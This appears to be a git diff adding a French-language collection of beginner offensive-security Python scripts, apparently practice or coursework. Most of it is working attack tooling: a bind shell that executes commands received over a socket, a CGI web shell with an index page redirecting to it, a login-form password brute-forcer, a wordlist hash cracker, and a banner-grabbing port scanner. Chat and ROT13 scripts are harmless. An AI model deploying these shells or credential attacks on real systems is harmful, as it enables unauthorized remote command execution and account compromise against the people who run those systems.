diff options
| -rw-r--r-- | bindshell.py | 16 | ||||
| -rw-r--r-- | bruteforce.py | 27 | ||||
| -rw-r--r-- | chat_client.py | 15 | ||||
| -rw-r--r-- | chat_server.py | 18 | ||||
| -rw-r--r-- | connect.py | 14 | ||||
| -rw-r--r-- | crack_hash.py | 20 | ||||
| -rwxr-xr-x | html/cgi-bin/webshell.cgi | 35 | ||||
| -rw-r--r-- | html/index.html | 12 | ||||
| -rw-r--r-- | rot13.py | 4 | ||||
| -rw-r--r-- | scan.py | 17 |
10 files changed, 178 insertions, 0 deletions
diff --git a/bindshell.py b/bindshell.py new file mode 100644 index 0000000..faa014d --- /dev/null +++ b/bindshell.py @@ -0,0 +1,16 @@ +#!/usr/bin/env python3 +import socket,os + +try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind(('', 1234)) + s.listen() + conn,addr = s.accept() + while 1: + data = conn.recv(1024) + reponse=os.popen(data.decode()).read() + conn.sendall(str(reponse).encode()) +except KeyboardInterrupt: + s.close() +finally: + print("bye") diff --git a/bruteforce.py b/bruteforce.py new file mode 100644 index 0000000..45d950b --- /dev/null +++ b/bruteforce.py @@ -0,0 +1,27 @@ +import sys +import requests + +def bruteforce(url,username,password): + reponse=requests.post(url=url,data={ + "username":username, + "password":password + }) + #print(reponse.text) + if "Mauvais mot de passe" in reponse.text: + print("mauvais pwd") + return False + else: + print(f"Trouvé password \"{password}\"") + return True + +if __name__ == "__main__": + url = sys.argv[1] + dico = sys.argv[2] + with open(dico, 'r') as wordlist: + for password in wordlist.readlines(): + password=password.strip() + if bruteforce(url,"jerome",password)==True: + sys.exit() + +#bruteforce("http://localhost/page.php","jerome","secret") + diff --git a/chat_client.py b/chat_client.py new file mode 100644 index 0000000..0d1d9e8 --- /dev/null +++ b/chat_client.py @@ -0,0 +1,15 @@ +#!/usr/bin/env python3 +import socket + +try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect(("localhost", 1234)) # adresse ip + port du serveur (tuple)) + while 1: + message= input() + s.sendall(message.encode()) + data=s.recv(1024) + print(data.decode()) +except KeyboardInterrupt: + s.close() +finally: + print("bye") diff --git a/chat_server.py b/chat_server.py new file mode 100644 index 0000000..d857e99 --- /dev/null +++ b/chat_server.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python3 +import socket + +try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind(('', 1234)) # toutes les interfaces réseau sur le port 1234 + s.listen() + conn,addr = s.accept() + while 1: + data=conn.recv(1024) + print(data.decode()) + reponse=input() + conn.sendall(reponse.encode()) +except KeyboardInterrupt: + s.close() +finally: + print("bye") + diff --git a/connect.py b/connect.py new file mode 100644 index 0000000..858d82f --- /dev/null +++ b/connect.py @@ -0,0 +1,14 @@ +import sys +host=sys.argv[1] +port=int(sys.argv[2]) + +import socket +s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) +addr_server=(host,port) +tentative=s.connect_ex(addr_server) #connect_ex renvoie 0 en cas de succès... +if tentative==0: + print("port 80 ouvert") +else: + print("Echec de connexion") +s.close() + diff --git a/crack_hash.py b/crack_hash.py new file mode 100644 index 0000000..a8ade90 --- /dev/null +++ b/crack_hash.py @@ -0,0 +1,20 @@ +import sys +import hashlib + +def crack_hash(hash,wordlist,hashsum) : + """ + Args: + hash : le hash à craquer + wordlist : la wordlist à utiliser + hashsum : md5 ou sha256 ou sha512... + """ + with open(wordlist,"r") as fichier: + lignes = fichier.readlines() + for ligne in lignes: + #if hashlib.md5(ligne.strip().encode()).hexdigest() == hash: + if getattr(hashlib, hashsum)(ligne.strip().encode()).hexdigest() == hash : + print(f"trouvé : {ligne}") + exit() + +if __name__ == "__main__": + crack_hash(sys.argv[1],sys.argv[2],sys.argv[3]) diff --git a/html/cgi-bin/webshell.cgi b/html/cgi-bin/webshell.cgi new file mode 100755 index 0000000..6598d37 --- /dev/null +++ b/html/cgi-bin/webshell.cgi @@ -0,0 +1,35 @@ +#!/usr/bin/env python3 + +# après avoir lancé le serveur : python3 -m http.server --cgi +# placer le script (rendu exécutable) dans /cgi-bin... + +import cgi +import os + +form = cgi.FieldStorage() +cmd = form.getvalue('command') +user = os.getlogin() +host = os.environ.get('SERVER_NAME') +pwd = os.environ.get('PWD') + +print("Content-Type: text/html; charset=UTF-8\n\n") +print (""" +<html> +<head> +<title>Web shell</title> +</head> +<body> +<h1>Web shell</h1> +<p>Entrez votre commande : </p> +<form action=''> +<input type='text' name='command' id='command' /> +<input type='submit' value='submit' /> +</form>""") +if cmd : + print("<pre style='display:inline-block;min-width:50em;padding:1em;background-color:black;color:white'>") + print(f"{user}@{host}:{pwd}$ {cmd}\n{os.popen(cmd).read()}") + print("</pre>") +print(""" +<script>document.getElementById("command").focus()</script> +</body> +</html>""") diff --git a/html/index.html b/html/index.html new file mode 100644 index 0000000..ac28908 --- /dev/null +++ b/html/index.html @@ -0,0 +1,12 @@ +<!DOCTYPE> +<html lang="en"> +<head> +<title>redirection</title> +<meta http-equiv="refresh" content="0;url=/cgi-bin/webshell.cgi" /> +</head> + +<body> + +</body> + +</html> diff --git a/rot13.py b/rot13.py new file mode 100644 index 0000000..f2d97b5 --- /dev/null +++ b/rot13.py @@ -0,0 +1,4 @@ +#!/usr/bin/env python3 +import codecs +message = input() +print(codecs.encode(message,'rot_13')) @@ -0,0 +1,17 @@ +import socket + +host="127.0.0.1" +for port in range(0,65535): + try: + s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) + s.settimeout(0.5) + s.connect((host,port)) # un tuple en argument : (( )) + try: + banner = s.recv(1024) + print("Le port ",port," est ouvert", banner.decode("utf-8").strip()) + except: + print("Le port ",port," est ouvert") + except: + pass + +s.close() |